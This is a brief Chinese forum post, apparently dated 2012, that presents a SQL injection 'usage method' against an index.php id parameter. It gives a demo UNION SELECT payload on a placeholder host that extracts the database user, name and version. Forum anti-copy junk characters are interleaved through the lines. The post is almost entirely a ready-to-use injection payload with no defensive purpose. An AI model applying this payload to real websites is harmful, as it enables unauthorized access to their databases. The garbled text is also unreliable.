利用方法:$ I" K. z0 ^& v; @0 u+ F( d1 [
http://www.xxx.com/index.php?id=[SQL]' z) H" {" u( N8 Z
Demo:
; b8 Z: {- R# k3 j! Q& B% ~ http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |
发表于 2012-9-10 20:47:28
收藏
支持
反对